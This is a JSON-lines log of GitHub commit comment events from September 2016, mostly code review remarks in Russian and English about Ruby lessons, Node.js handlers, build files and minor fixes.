{"id":"4511870480","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Meburashka/java_test"},"payload":{"comment":{"id":18889392,"position":14,"line":85,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"d5f1dacce36144d1add67cd3e76d85e4862ae57d","created_at":"2016-09-03T08:59:56Z","updated_at":"2016-09-03T08:59:56Z","body":"fillContactForm(contract, true);"}},"created_at":"2016-09-03T08:59:56Z"}
{"id":"4511872335","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889399,"position":58,"line":35,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:01:21Z","updated_at":"2016-09-03T09:01:21Z","body":"Теперь мы берём в массиве `@full_route` конечную станцию и пытаемся к ней добавить `station_name` с помощью метода `<<`. Смотри в сторону вставки элемента в массив."}},"created_at":"2016-09-03T09:01:21Z"}
{"id":"4511872534","type":"CommitCommentEvent","actor":{"login":"nkast"},"repo":{"name":"MonoGame/MonoGame"},"payload":{"comment":{"id":18889400,"position":63,"line":147,"path":"MonoGame.Framework/Audio/SoundEffect.OpenAL.cs","commit_id":"3713daf5e632395a1837f681e2d56299eb0e99b4","created_at":"2016-09-03T09:01:32Z","updated_at":"2016-09-03T09:01:32Z","body":"According to this https://github.com/MonoGame/MonoGame/blob/develop/MonoGame.Framework/Content/ContentReaders/SoundEffectReader.cs#L31 ,\r\nblockAlignment is a WORD. I get strange values like 262145 (=0x00040001)."}},"created_at":"2016-09-03T09:01:32Z"}
{"id":"4511872573","type":"CommitCommentEvent","actor":{"login":"GlitchPlayer"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889401,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-03T09:01:34Z","updated_at":"2016-09-03T09:01:34Z","body":"We don't know, since you didn't provide your plugins ._.\r\n"}},"created_at":"2016-09-03T09:01:34Z"}
{"id":"4511873518","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889403,"position":58,"line":35,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:02:26Z","updated_at":"2016-09-03T09:02:26Z","body":"Другой момент, мы же храним в `@full_route` массив с **объектами** станций, а не только с названиями станций. Поэтому метод `add_station` должен принимать в качестве аргумента именно **объект станции**, а не её название."}},"created_at":"2016-09-03T09:02:26Z"}
{"id":"4511874021","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889406,"position":64,"line":38,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:02:56Z","updated_at":"2016-09-03T09:02:56Z","body":"То же самое что выше относительно объекта станции."}},"created_at":"2016-09-03T09:02:56Z"}
{"id":"4511874191","type":"CommitCommentEvent","actor":{"login":"GlitchPlayer"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889407,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-03T09:03:09Z","updated_at":"2016-09-03T09:03:09Z","body":"We don't know, since you didn't provide your plugins ._.\r\n"}},"created_at":"2016-09-03T09:03:09Z"}
{"id":"4511874576","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889409,"position":65,"line":39,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:03:32Z","updated_at":"2016-09-03T09:03:32Z","body":"Что же мы в итоге храним в `@full_route`: объекты станций или только их названия?"}},"created_at":"2016-09-03T09:03:32Z"}
{"id":"4511875529","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889413,"position":5,"line":420,"path":"artiq/gateware/targets/kc705.py","commit_id":"72dda5ec6226cce61f0b5d7e648c0704e286b5ed","created_at":"2016-09-03T09:04:27Z","updated_at":"2016-09-03T09:04:27Z","body":"Such definitions are redundant with the device database, and we should remove them at some point (cc @whitequark as the Rust rewrite would be a good occasion)."}},"created_at":"2016-09-03T09:04:27Z"}
{"id":"4511876066","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889414,"position":65,"line":39,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:04:54Z","updated_at":"2016-09-03T09:04:54Z","body":"Другой момент, поскольку ранее мы нигде не определяли **переменную экземпляра** `@station_start` то вызов метода `station_start` здесь будет всегда возвращать `nil`. "}},"created_at":"2016-09-03T09:04:54Z"}
{"id":"4511876705","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889419,"position":65,"line":39,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:05:28Z","updated_at":"2016-09-03T09:05:28Z","body":"Ещё один способ совершать такие проверки: `[station_start, station_end].include?(station_name)`."}},"created_at":"2016-09-03T09:05:28Z"}
{"id":"4511877598","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889425,"position":115,"line":67,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:06:15Z","updated_at":"2016-09-03T09:06:15Z","body":"Отлично! Так намного понятней )"}},"created_at":"2016-09-03T09:06:15Z"}
{"id":"4511878315","type":"CommitCommentEvent","actor":{"login":"100010"},"repo":{"name":"hatake511522/sample"},"payload":{"comment":{"id":18889426,"position":10,"line":5,"path":"config/routes.rb","commit_id":"0c287e6f5f4334730794ad9185b27ce462769be7","created_at":"2016-09-03T09:06:50Z","updated_at":"2016-09-03T09:06:50Z","body":"いいねb"}},"created_at":"2016-09-03T09:06:50Z"}
{"id":"4511878794","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889429,"position":136,"line":79,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:07:14Z","updated_at":"2016-09-03T09:07:14Z","body":"👍 "}},"created_at":"2016-09-03T09:07:14Z"}
{"id":"4511878998","type":"CommitCommentEvent","actor":{"login":"korun"},"repo":{"name":"korun/d2b"},"payload":{"comment":{"id":18889430,"position":52,"line":126,"path":"spec/services/battle_service_spec.rb","commit_id":"9bee71c9aaf79b02d790fca8353196758ba4f414","created_at":"2016-09-03T09:07:24Z","updated_at":"2016-09-03T09:07:24Z","body":"Это неправильно, нужно заменить на вторую линию."}},"created_at":"2016-09-03T09:07:24Z"}
{"id":"4511879034","type":"CommitCommentEvent","actor":{"login":"conjelo"},"repo":{"name":"gitpay/sales"},"payload":{"comment":{"id":18889431,"position":4,"line":4,"path":"README.md","commit_id":"891916b23379bff2dd1b138cf9d92dd818ede023","created_at":"2016-09-03T09:07:27Z","updated_at":"2016-09-03T09:07:27Z","body":"hello"}},"created_at":"2016-09-03T09:07:27Z"}
{"id":"4511879322","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"Monte9/HelloWorld-Go"},"payload":{"comment":{"id":18889433,"position":null,"line":null,"path":null,"commit_id":"fb4627a676c623eb2d9d6c44c589f2ce0fdf091d","created_at":"2016-09-03T09:07:43Z","updated_at":"2016-09-03T09:07:43Z","body":"Looking good. Nice work @Monte9! :)"}},"created_at":"2016-09-03T09:07:43Z"}
{"id":"4511879559","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889435,"position":150,"line":87,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:07:55Z","updated_at":"2016-09-03T09:07:55Z","body":"Выше при выводе количества вагонов изменил название переменной, а здесь по-прежнему `@wagon_number`."}},"created_at":"2016-09-03T09:07:55Z"}
{"id":"4511879610","type":"CommitCommentEvent","actor":{"login":"JarnoVgr"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":18889436,"position":null,"line":null,"path":null,"commit_id":"a16e5dc447f51d54eeef018c928e597f5a98a7e6","created_at":"2016-09-03T09:07:58Z","updated_at":"2016-09-03T09:07:58Z","body":"Maybe consider to put names in an array and then build up the gui."}},"created_at":"2016-09-03T09:07:58Z"}
{"id":"4511879994","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":18889438,"position":null,"line":null,"path":null,"commit_id":"14985b3a2ff665f8f27d084a3cfa60ced8270ad5","created_at":"2016-09-03T09:08:18Z","updated_at":"2016-09-03T09:08:18Z","body":"The USBcamera.hpp and the other .h files are in current source directory, that is not included. At the moment the folder is erroneously included yarp_prepare_plugin, but I want to change it soon on devel"}},"created_at":"2016-09-03T09:08:18Z"}
{"id":"4511880497","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889441,"position":150,"line":87,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:08:47Z","updated_at":"2016-09-03T09:08:47Z","body":"В задании поезд может прицеплять и отцеплять по **одному** вагону за раз."}},"created_at":"2016-09-03T09:08:47Z"}
{"id":"4511881665","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889447,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:09:57Z","updated_at":"2016-09-03T09:09:57Z","body":"Зачем здесь юзера загружаем, у нас же sso юзера кладет сюда"}},"created_at":"2016-09-03T09:09:57Z"}
{"id":"4511882088","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889451,"position":68,"line":42,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:10:20Z","updated_at":"2016-09-03T09:10:20Z","body":"Мы же должны конкретный объект станции удалить, а здесь мы пытаемся удалить элемент из массива который должен являться классом станции."}},"created_at":"2016-09-03T09:10:20Z"}
{"id":"4511882868","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889455,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:10:57Z","updated_at":"2016-09-03T09:10:57Z","body":"Зачем документ в this. Мы в  this кладем что-то, если хотим передавать данные между миддлверами. Здесь же нет необходимости в этом: мы в этом миддлвере и ищем документ, и сохраняем."}},"created_at":"2016-09-03T09:10:57Z"}
{"id":"4511883906","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889459,"position":158,"line":92,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:11:49Z","updated_at":"2016-09-03T09:11:49Z","body":"Здесь мы должны присваивать объект маршрута переменной экземпляра: `@current_route = route`. "}},"created_at":"2016-09-03T09:11:49Z"}
{"id":"4511884663","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889462,"position":5,"line":420,"path":"artiq/gateware/targets/kc705.py","commit_id":"72dda5ec6226cce61f0b5d7e648c0704e286b5ed","created_at":"2016-09-03T09:12:30Z","updated_at":"2016-09-03T09:12:30Z","body":"To me they will only be redundant once we generate a device_db template for each target. Otherwise it is extremely tedious and error-prone to count/predict the channel numbers."}},"created_at":"2016-09-03T09:12:30Z"}
{"id":"4511884971","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889464,"position":146,"line":83,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:12:45Z","updated_at":"2016-09-03T09:12:45Z","body":"Ещё нам нужен метод для отцепления вагона."}},"created_at":"2016-09-03T09:12:45Z"}
{"id":"4511885857","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889469,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:13:33Z","updated_at":"2016-09-03T09:13:33Z","body":"Хотя вообще это не нужно даже, потому что метод BI.addDislike все сохранил уже. Мы дергаем document.save, если используем не статические методы. То есть по сути поиск документа и его сохранение тут не нужно"}},"created_at":"2016-09-03T09:13:33Z"}
{"id":"4511886050","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889470,"position":5,"line":420,"path":"artiq/gateware/targets/kc705.py","commit_id":"72dda5ec6226cce61f0b5d7e648c0704e286b5ed","created_at":"2016-09-03T09:13:44Z","updated_at":"2016-09-03T09:13:44Z","body":"Yes, but generated/csr.h is not the right place to output this information."}},"created_at":"2016-09-03T09:13:44Z"}
{"id":"4511887802","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889479,"position":14,"line":14,"path":"routes/documents/handlers/addWatch.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:15:10Z","updated_at":"2016-09-03T09:15:10Z","body":"тоже не нужно сохранять документ, метод addWatch статический"}},"created_at":"2016-09-03T09:15:10Z"}
{"id":"4511889875","type":"CommitCommentEvent","actor":{"login":"wilddom"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18889486,"position":742,"line":1121,"path":"adm_program/system/classes/user.php","commit_id":"ac730497c97f415eba2f49201ff91bc3335db461","created_at":"2016-09-03T09:17:00Z","updated_at":"2016-09-03T09:17:00Z","body":"This should be `$this->listViewRights` instead of `$this->listMailRights`, shouldn't it?"}},"created_at":"2016-09-03T09:17:00Z"}
{"id":"4511890583","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889490,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:17:38Z","updated_at":"2016-09-03T09:17:38Z","body":"почему validation error? Здесь же юзер все правильно сделал, данные хорошие прислал, мы просто не нашли ничего. Правильнее будет поставить статус 204 и все."}},"created_at":"2016-09-03T09:17:38Z"}
{"id":"4511890765","type":"CommitCommentEvent","actor":{"login":"junaidshah111"},"repo":{"name":"junaidshah111/helloworld"},"payload":{"comment":{"id":18889491,"position":null,"line":null,"path":null,"commit_id":"949dc8375ad83e875c1be4d63ee7744cddb8e980","created_at":"2016-09-03T09:17:48Z","updated_at":"2016-09-03T09:17:48Z","body":"very tough time to github\r\n"}},"created_at":"2016-09-03T09:17:48Z"}
{"id":"4511891138","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889494,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:18:08Z","updated_at":"2016-09-03T09:18:08Z","body":"и еще тут нет проверки на то, что не найден документ. Если не найден документ, кинется ошибка DbError c кодом 404"}},"created_at":"2016-09-03T09:18:08Z"}
{"id":"4511891599","type":"CommitCommentEvent","actor":{"login":"FoxInFlame"},"repo":{"name":"FoxInFlame/QuickMyAnimeList"},"payload":{"comment":{"id":18889495,"position":null,"line":null,"path":null,"commit_id":"3c27e587a85a008e5adeaaaa1522855fe6a46310","created_at":"2016-09-03T09:18:35Z","updated_at":"2016-09-03T09:18:35Z","body":"Because I'm one of those people who change passwords to websites every 1 month or so, this doesn't really matter, if anyone is wondering."}},"created_at":"2016-09-03T09:18:35Z"}
{"id":"4511891978","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889499,"position":13,"line":16,"path":"routes/documents/handlers/getDocumentsBy.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:18:58Z","updated_at":"2016-09-03T09:18:58Z","body":"опять же почему validation error и 204"}},"created_at":"2016-09-03T09:18:58Z"}
{"id":"4511892044","type":"CommitCommentEvent","actor":{"login":"vk11515"},"repo":{"name":"vk11515/repname"},"payload":{"comment":{"id":18889500,"position":null,"line":null,"path":null,"commit_id":"fe34a63f564bafbe03dc72bdc4da7875bd33c7a6","created_at":"2016-09-03T09:19:01Z","updated_at":"2016-09-03T09:19:01Z","body":"n"}},"created_at":"2016-09-03T09:19:01Z"}
{"id":"4511892234","type":"CommitCommentEvent","actor":{"login":"Thomas101"},"repo":{"name":"Thomas101/nodehun"},"payload":{"comment":{"id":18889501,"position":null,"line":null,"path":null,"commit_id":"48d2f2b0bfb33c23285317f3ef64c0d05f95fc72","created_at":"2016-09-03T09:19:12Z","updated_at":"2016-09-03T09:19:12Z","body":"Ah awesome! Was just going to say I'll send a PR for this!"}},"created_at":"2016-09-03T09:19:12Z"}
{"id":"4511892746","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889502,"position":2,"line":51,"path":"routes/documents/index.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:19:39Z","updated_at":"2016-09-03T09:19:39Z","body":"а что делает этот запрос?:)"}},"created_at":"2016-09-03T09:19:39Z"}
{"id":"4511893215","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18889504,"position":8,"line":16,"path":"Lesson9/accessor.rb","commit_id":"efb1b8bbec3b1eb8a1bd6ea33850ddd42ca4c220","created_at":"2016-09-03T09:20:07Z","updated_at":"2016-09-03T09:20:07Z","body":"Т.е. в первый раз мы присвоим туда значение, это ок. Но вот как потом мы будем туда значения добавлять? Поясню. Допустим, у нас значение 1, атрибут называется abc. В первый раз мы делаем:\r\n\r\n`@history[:abc] = 1`\r\n\r\nА во второй? `@history[:abc] << 2`. Но это не сработает, т.к. там находится 1, и операция  << для числа не определена. "}},"created_at":"2016-09-03T09:20:07Z"}
{"id":"4511894054","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Dgameman1/phpmyadmin"},"payload":{"comment":{"id":18889507,"position":null,"line":null,"path":null,"commit_id":"ff4c31bdec1ef271c252f20422ffc498633094f7","created_at":"2016-09-03T09:20:54Z","updated_at":"2016-09-03T09:20:54Z","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2016-09-03T09:20:54Z"}
{"id":"4511894064","type":"CommitCommentEvent","actor":{"login":"matthid"},"repo":{"name":"fsprojects/Paket"},"payload":{"comment":{"id":18889508,"position":18,"line":120,"path":"tests/Paket.Tests/Resolver/DependencyGroupsAndRestrictions.fs","commit_id":"5512a517b2a2983e46ffb0e2214a4529357c1944","created_at":"2016-09-03T09:20:54Z","updated_at":"2016-09-03T09:20:54Z","body":"I think this is still needed :) . `graph2` might be removed..."}},"created_at":"2016-09-03T09:20:54Z"}
{"id":"4511894914","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18889512,"position":8,"line":16,"path":"Lesson9/accessor.rb","commit_id":"efb1b8bbec3b1eb8a1bd6ea33850ddd42ca4c220","created_at":"2016-09-03T09:21:42Z","updated_at":"2016-09-03T09:21:42Z","body":"Нужно чтобы в первый раз сразу присваивался массив со значением: `[value]`"}},"created_at":"2016-09-03T09:21:42Z"}
{"id":"4511896974","type":"CommitCommentEvent","actor":{"login":"Mandrace84"},"repo":{"name":"Mandrace84/javascript-evolution"},"payload":{"comment":{"id":18889518,"position":null,"line":null,"path":null,"commit_id":"28ad0a7bfa07de68be9e6f8fb982d5ee4eb3baec","created_at":"2016-09-03T09:23:44Z","updated_at":"2016-09-03T09:23:44Z","body":"Errore di sintassi unexpected identifier ]"}},"created_at":"2016-09-03T09:23:44Z"}
{"id":"4511897136","type":"CommitCommentEvent","actor":{"login":"mtkopone"},"repo":{"name":"mtkopone/google-analytics-plugin"},"payload":{"comment":{"id":18889520,"position":null,"line":null,"path":null,"commit_id":"e349dd5a99b80903358bc7917377fab1fa1b0ee7","created_at":"2016-09-03T09:23:55Z","updated_at":"2016-09-03T09:23:55Z","body":"Yeah. It's just that we have some other, non-relevant modifications as well, so my attempt at making a pull request failed. Maybe you can just cherry-pick the relevant commit to your fork?\n\n--\nMikko\n\n> On 3.9.2016, at 11.32, victor sosa <notifications@github.com> wrote:\n> \n> Hi \n> would you like to contribute this change to the project?\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-03T09:23:55Z"}
{"id":"4511897191","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18889521,"position":8,"line":8,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-03T09:23:59Z","updated_at":"2016-09-03T09:23:59Z","body":"😛 you really hate maven, you should use SNAPSHOT."}},"created_at":"2016-09-03T09:23:59Z"}
{"id":"4511898233","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18889524,"position":65,"line":65,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-03T09:24:57Z","updated_at":"2016-09-03T09:24:57Z","body":"the more you customize maven, the more you will going to hate it 😉 "}},"created_at":"2016-09-03T09:24:57Z"}
{"id":"4511899377","type":"CommitCommentEvent","actor":{"login":"CornerOfSkyline"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18889526,"position":null,"line":null,"path":null,"commit_id":"ece70dc18d389cc29163497a587686ca71816047","created_at":"2016-09-03T09:25:59Z","updated_at":"2016-09-03T09:25:59Z","body":"Lorenz, what behaviour will be when the commander app overload?  We found that sometimes the sdlog2 record the log data few and scattered.  Did this can cause the autopilot reset or the program running out? @LorenzMeier "}},"created_at":"2016-09-03T09:25:59Z"}
{"id":"4511899821","type":"CommitCommentEvent","actor":{"login":"CpuID"},"repo":{"name":"hashicorp/consul"},"payload":{"comment":{"id":18889528,"position":null,"line":null,"path":null,"commit_id":"2c9885d10d5ca5709dae8e93af364723ab4c7af6","created_at":"2016-09-03T09:26:24Z","updated_at":"2016-09-03T09:26:24Z","body":"❤️ "}},"created_at":"2016-09-03T09:26:24Z"}
{"id":"4511900167","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889530,"position":null,"line":null,"path":null,"commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T09:26:44Z","updated_at":"2016-09-03T09:26:44Z","body":"**Game plan:**\r\n\r\n- [ ] Разобраться с разницей между локальными переменными и переменными экземпляра (cмотри [этот комментарий](http://connect.thinknetica.com/t/aleksandr-zadkov-aleks-poste/3049/33?u=spaceflow))\r\n- [ ] Разобраться в различиях между вызовом метода аксессора и обращением к переменной экземпляра напрямую\r\n- [ ] Поэкспериментировать в `irb` с локальными переменными и переменными экземпляра\r\n- [ ] Разобраться с возможностями массивом: добавление, удаление и вставка элементов\r\n- [ ] Понять различия между объектом как таковым и, например, строкой. Ответить на вопрос когда мы должны передавать именно объект, а когда строку"}},"created_at":"2016-09-03T09:26:44Z"}
{"id":"4511900823","type":"CommitCommentEvent","actor":{"login":"ottowayne"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18889532,"position":null,"line":null,"path":null,"commit_id":"ed37923bc75f18a9046903bb8bf5bae233931841","created_at":"2016-09-03T09:27:20Z","updated_at":"2016-09-03T09:27:20Z","body":"How about \"[Readme] Fix IRC link\" for more detailed commit messages ;)"}},"created_at":"2016-09-03T09:27:20Z"}
{"id":"4511900882","type":"CommitCommentEvent","actor":{"login":"mqm76200"},"repo":{"name":"mqm76200/passwordbot"},"payload":{"comment":{"id":18889533,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T09:27:24Z","updated_at":"2016-09-03T09:27:24Z","body":"bmbh"}},"created_at":"2016-09-03T09:27:24Z"}
{"id":"4511901251","type":"CommitCommentEvent","actor":{"login":"vicentxiong"},"repo":{"name":"vicentxiong/vxLauncher"},"payload":{"comment":{"id":18889534,"position":null,"line":null,"path":null,"commit_id":"7a4f5ca36e76afddf5f9f044668d7f5b58ad4bfd","created_at":"2016-09-03T09:27:45Z","updated_at":"2016-09-03T09:27:45Z","body":"add project"}},"created_at":"2016-09-03T09:27:45Z"}
{"id":"4511903235","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18889539,"position":742,"line":1121,"path":"adm_program/system/classes/user.php","commit_id":"ac730497c97f415eba2f49201ff91bc3335db461","created_at":"2016-09-03T09:29:43Z","updated_at":"2016-09-03T09:29:43Z","body":"@wilddom thanks. is fixed: 5ebd37bf8b29b43654dfe6e91dbbfa50603a6f4b"}},"created_at":"2016-09-03T09:29:43Z"}
{"id":"4511903999","type":"CommitCommentEvent","actor":{"login":"kowbi"},"repo":{"name":"kowbi/tutorial"},"payload":{"comment":{"id":18889541,"position":3,"line":3,"path":"README.md","commit_id":"96195f1cf7e9e8dcaaad134c07bb686052937b7d","created_at":"2016-09-03T09:30:25Z","updated_at":"2016-09-03T09:30:25Z","body":"Test "}},"created_at":"2016-09-03T09:30:25Z"}
{"id":"4511904136","type":"CommitCommentEvent","actor":{"login":"mqm76200"},"repo":{"name":"mqm76200/passwordbot"},"payload":{"comment":{"id":18889542,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T09:30:30Z","updated_at":"2016-09-03T09:30:30Z","body":"199675775"}},"created_at":"2016-09-03T09:30:30Z"}
{"id":"4511904319","type":"CommitCommentEvent","actor":{"login":"mqm76200"},"repo":{"name":"mqm76200/passwordbot"},"payload":{"comment":{"id":18889543,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-03T09:30:38Z","updated_at":"2016-09-03T09:30:38Z","body":"199675775"}},"created_at":"2016-09-03T09:30:38Z"}
{"id":"4511905749","type":"CommitCommentEvent","actor":{"login":"FireNeslo"},"repo":{"name":"FireNeslo/blobify"},"payload":{"comment":{"id":18889548,"position":5,"line":17,"path":"index.js","commit_id":"5556a86dc97d97c0b841e05683b2081b7345d354","created_at":"2016-09-03T09:31:57Z","updated_at":"2016-09-03T09:31:57Z","body":"check [feature-use-mimetype](https://github.com/fireneslo/blobify/tree/feature-use-mimetype).\r\n\r\nbut basically i always like to add some nice convenient defaults like '.blob' just if you want to use it.\r\n\r\nLast version also browserified the file inside the blob so that it could use requires itself. this branch makes that optional and kinda opt in because you'll need to specify '.js' or probably better '.blob.js' in you list of extensions.\r\n\r\nAlso while i kept the _ shorthand I added an extensions option as that is more descriptive."}},"created_at":"2016-09-03T09:31:57Z"}
{"id":"4511906435","type":"CommitCommentEvent","actor":{"login":"Ruben9922"},"repo":{"name":"Ruben9922/arithmetic-game"},"payload":{"comment":{"id":18889549,"position":29,"line":76,"path":"ArithmeticGame/Program.cs","commit_id":"5604f30ce046c3250687d39847e8060fa4bbf2bf","created_at":"2016-09-03T09:32:34Z","updated_at":"2016-09-03T09:32:34Z","body":"Might change in future so that score also takes into account absolute value of the minimum and/or maximum operands, since this also affects difficulty, particularly in multiplication and division.\r\nFor example, entering a minimum operand of 17 and a maximum operand of 18 results in `range` being 1, so the score only increases by 1 if answer is correct, but one of the questions might be 17 * 18 which is relatively difficult."}},"created_at":"2016-09-03T09:32:34Z"}
